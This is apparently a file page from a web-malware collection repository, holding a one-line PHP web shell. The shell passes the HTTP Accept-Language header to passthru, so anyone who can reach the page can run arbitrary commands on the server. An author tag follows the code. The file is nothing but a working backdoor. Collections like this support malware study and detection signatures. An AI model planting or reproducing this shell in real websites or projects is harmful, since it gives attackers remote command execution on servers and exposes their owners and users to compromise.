webshell/web-malware-collection-13-06-2012/PHP/accept_language.txt

2 lines
76 B
Text
Raw Normal View History

2013-06-05 04:08:30 +00:00
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>